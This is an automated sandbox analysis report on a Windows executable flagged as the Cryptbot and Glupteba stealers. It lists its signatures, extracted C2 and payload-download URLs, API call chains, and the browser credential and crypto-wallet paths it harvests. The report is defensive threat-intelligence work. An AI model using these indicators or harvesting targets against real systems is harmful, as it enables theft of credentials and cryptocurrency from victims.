Play interactive tour

Edit tour

Windows Analysis Report file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	501609
MD5:	6738381ddd3d2952312af2a0f2be5157
SHA1:	40fa53df583e9b598bb2d7be716958b1f5bad0dc
SHA256:	84f4e2b346b6f5473e2c564a6f60985c5d20f621e70a982e9aafd21354ccc66f
Infos:
Most interesting Screenshot:

Detection

Cryptbot Glupteba

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected Cryptbot

Detected unpacking (overwrites its own PE header)

Yara detected Glupteba

Detected unpacking (changes PE section rights)

Antivirus detection for URL or domain

Machine Learning detection for sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Is looking for software installed on the system

Queries information about the installed CPU (vendor, model number etc)

PE file contains strange resources

Contains functionality to read the PEB

Contains functionality to download and launch executables

Contains capabilities to detect virtual machines

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Tries to resolve domain names, but no domain seems valid (expired dropper behavior)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

file.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\file.exe' MD5: 6738381DDD3D2952312AF2A0F2BE5157)

cleanup

Malware Configuration

Threatname: Cryptbot

{"Download URL": "http://bojwfi01.top/download.php?file=lv.exe", "C2 list": ["moresh01.top/index.php", "cemnit12.top/index.php"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
00000000.00000002.929802806.0000000001840000.00000040.00000001.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: file.exe PID: 5940	JoeSecurity_Glupteba_1	Yara detected Glupteba	Joe Security
Process Memory Space: file.exe PID: 5940	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security

Unpacked PEs

Source	Rule	Description	Author
0.2.file.exe.400000.0.unpack	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
0.2.file.exe.400000.0.raw.unpack	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
0.2.file.exe.1840e50.1.unpack	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
0.3.file.exe.3360000.0.unpack	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
0.2.file.exe.1840e50.1.raw.unpack	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
0.3.file.exe.3360000.0.raw.unpack	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Click to see the 1 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0.2.file.exe.1840e50.1.raw.unpack

Malware Configuration Extractor: Cryptbot {"Download URL": "http://bojwfi01.top/download.php?file=lv.exe", "C2 list": ["moresh01.top/index.php", "cemnit12.top/index.php"]}

Multi AV Scanner detection for submitted file

Show sources

Source: file.exe

ReversingLabs: Detection: 60%

Antivirus detection for URL or domain

Show sources

Source: http://bojwfi01.top/download.php?file=lv.exe	Avira URL Cloud: Label: malware
Source: moresh01.top/index.php	Avira URL Cloud: Label: malware

Machine Learning detection for sample

Show sources

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00401220 GetFileAttributesW,CreateFileW,GetFileSizeEx,CloseHandle,CreateFileMappingW,MapViewOfFile,CloseHandle,CloseHandle,CryptUnprotectData,LocalFree,UnmapViewOfFile,CloseHandle,FindCloseChangeNotification,CloseHandle,

0_2_00401220

Compliance:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Source: file.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: C:\pubezepimog\teyakucarurab_vijuwatizuxi_33.pdb0E source: file.exe
Source:	Binary string: C:\pubezepimog\teyakucarurab_vijuwatizuxi_33.pdb source: file.exe

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402680 Sleep,FindFirstFileW,FindNextFileW,FindClose,		0_2_00402680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042ABC1 FindFirstFileExW,		0_2_0042ABC1

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: moresh01.top/index.php
Source: Malware configuration extractor	URLs: cemnit12.top/index.php

Source: unknown

DNS traffic detected: query: cemnit12.top replaycode: Server failure (2)

Source: file.exe, file.exe, 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmp	String found in binary or memory: http://bojwfi01.top/download.php?file=lv.exe
Source: file.exe, 00000000.00000002.930560853.0000000003F08000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/in-k
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.php
Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.php#
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.php#An
Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.php&
Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.php0
Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.php7
Source: file.exe, 00000000.00000002.929909251.00000000019FC000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.php?J
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpB
Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpF
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpFB
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpMB
Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpP
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpPB
Source: file.exe, 00000000.00000002.930535454.0000000003ED8000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpQ
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpWB
Source: file.exe, 00000000.00000002.930014729.0000000001A7C000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpX
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpZB
Source: file.exe, 00000000.00000002.930014729.0000000001A7C000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpb
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpe
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpeB
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phphB
Source: file.exe, 00000000.00000002.929909251.00000000019FC000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpl
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpoB
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phprB
Source: file.exe, 00000000.00000002.930031253.0000000001A88000.00000004.00000001.sdmp	String found in binary or memory: http://cemnit12.top/index.phpyB
Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.670329414.0000000001A36000.00000004.00000001.sdmp, default_webdata.db.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

DNS traffic detected: queries for: cemnit12.top

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040DB70 CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,

0_2_0040DB70

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040AD20 RegQueryValueExW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetDesktopWindow,GetWindowRect,GetWindowDC,GetDeviceCaps,CreateCompatibleDC,CreateDIBSection,DeleteDC,DeleteDC,DeleteDC,GdiplusShutdown,SaveDC,SelectObject,BitBlt,RestoreDC,DeleteDC,DeleteDC,DeleteDC,GdipAlloc,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,DeleteObject,GdiplusShutdown,CopyFileW,

0_2_0040AD20

Source: file.exe, 00000000.00000002.929870758.00000000019C8000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: file.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00414000	0_2_00414000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041B72F	0_2_0041B72F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004138F0	0_2_004138F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043030F	0_2_0043030F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004223F0	0_2_004223F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00420429	0_2_00420429
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043042F	0_2_0043042F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041B4FD	0_2_0041B4FD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00413580	0_2_00413580
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004327BD	0_2_004327BD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00433800	0_2_00433800
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041B994	0_2_0041B994
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00411A10	0_2_00411A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042DAF1	0_2_0042DAF1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00410E50	0_2_00410E50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0044EA80	0_2_0044EA80

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0040F2F0 appears 57 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00416C70 appears 50 times

Source: file.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: file.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: file.exe

ReversingLabs: Detection: 60%

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Roaming\andian

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\htRscv

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@1/13@73/0

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \_Files	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \_Files\_Files	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \_Files\_Wallet	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \_Files\_Chrome	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \_Files\_Opera	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \_Files\_Brave	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \files_	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \files_\files	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \files_\_Chrome	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \files_\_Opera	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: \files_\_Brave	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: %Temp%\	0_2_00415BF0
Source: C:\Users\user\Desktop\file.exe	Command line argument: >.C	0_2_00432D90

Source: C:\Users\user\Desktop\file.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\pubezepimog\teyakucarurab_vijuwatizuxi_33.pdb0E source: file.exe
Source:	Binary string: C:\pubezepimog\teyakucarurab_vijuwatizuxi_33.pdb source: file.exe

Data Obfuscation:

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\file.exe

Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0043668D push esi; ret	0_2_00436696
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00408A6A push 48680000h; ret	0_2_00408A77
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00416CB6 push ecx; ret	0_2_00416CC9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_019DB1DD pushad ; iretd	0_2_019DB1DE

Source: initial sample

Static PE information: section name: .text entropy: 7.34053606656

Source: C:\Users\user\Desktop\file.exe

0_2_0040DB70

Source: C:\Users\user\Desktop\file.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

Registry key enumerated: More than 174 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\file.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040A6E3 GetFileAttributesW,GetFileAttributesW,GetSystemInfo,KiUserCallbackDispatcher,GlobalMemoryStatusEx,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,

0_2_0040A6E3

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00402680 Sleep,FindFirstFileW,FindNextFileW,FindClose,		0_2_00402680
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042ABC1 FindFirstFileExW,		0_2_0042ABC1

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: file.exe, 00000000.00000002.929983814.0000000001A43000.00000004.00000001.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllbn;G

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0041D1DD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0041D1DD

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0042C070 GetProcessHeap,

0_2_0042C070

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_004230B1 mov eax, dword ptr fs:[00000030h]		0_2_004230B1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0042A824 mov eax, dword ptr fs:[00000030h]		0_2_0042A824

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0041D1DD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0041D1DD
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00416A61 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00416A61
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00416BF7 SetUnhandledExceptionFilter,	0_2_00416BF7
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00416E3D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00416E3D

Source: file.exe, 00000000.00000002.930113974.0000000001F50000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: file.exe, 00000000.00000002.930113974.0000000001F50000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: file.exe, 00000000.00000002.930113974.0000000001F50000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: file.exe, 00000000.00000002.930113974.0000000001F50000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_cookies.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_key.bin VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_logins.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Chrome\default_webdata.db VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Information.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\sqBlhapfmZnM\_Files\_Screen_Desktop.jpeg VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: CreateFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,GetModuleFileNameW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,ExpandEnvironmentStringsW,GetFileAttributesW,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoW,LocalFree,_strftime,_strftime,GetUserNameW,GetComputerNameW,RegOpenKeyExW,RegOpenKeyExW,RegQueryValueExW,RegQueryValueExW,RegCloseKey,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,CopyFileW,CreateDirectoryW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,Sleep,Sleep,Sleep,Sleep,Sleep,ExpandEnvironmentStringsW,DeleteFileW,Sleep,URLDownloadToFileW,Sleep,CreateFileW,CloseHandle,ShellExecuteW,

0_2_0040DB70

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00416891 cpuid

0_2_00416891

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00413A40 SetFilePointer,SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime,FileTimeToSystemTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_00413A40

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00429D74 _free,_free,_free,GetTimeZoneInformation,_free,

0_2_00429D74

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_0040AA30 GetFileAttributesW,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,RegCloseKey,RegOpenKeyExW,RegCloseKey,GetUserNameW,ExpandEnvironmentStringsW,CreateDirectoryW,Sleep,

0_2_0040AA30

Stealing of Sensitive Information:

Yara detected Cryptbot

Show sources

Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.1840e50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.3360000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.1840e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.3360000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.666994856.0000000003360000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.929802806.0000000001840000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.929594713.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR

Yara detected Glupteba

Show sources

Source: Yara match

File source: Process Memory Space: file.exe PID: 5940, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: file.exe	String found in binary or memory: %AppData%\Electrum-btcp\wallets
Source: file.exe	String found in binary or memory: %AppData%\ElectronCash\wallets
Source: file.exe	String found in binary or memory: %AppData%\Jaxx\Local Storage
Source: file.exe	String found in binary or memory: %AppData%\Exodus\backup
Source: file.exe	String found in binary or memory: %AppData%\Exodus\backup

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
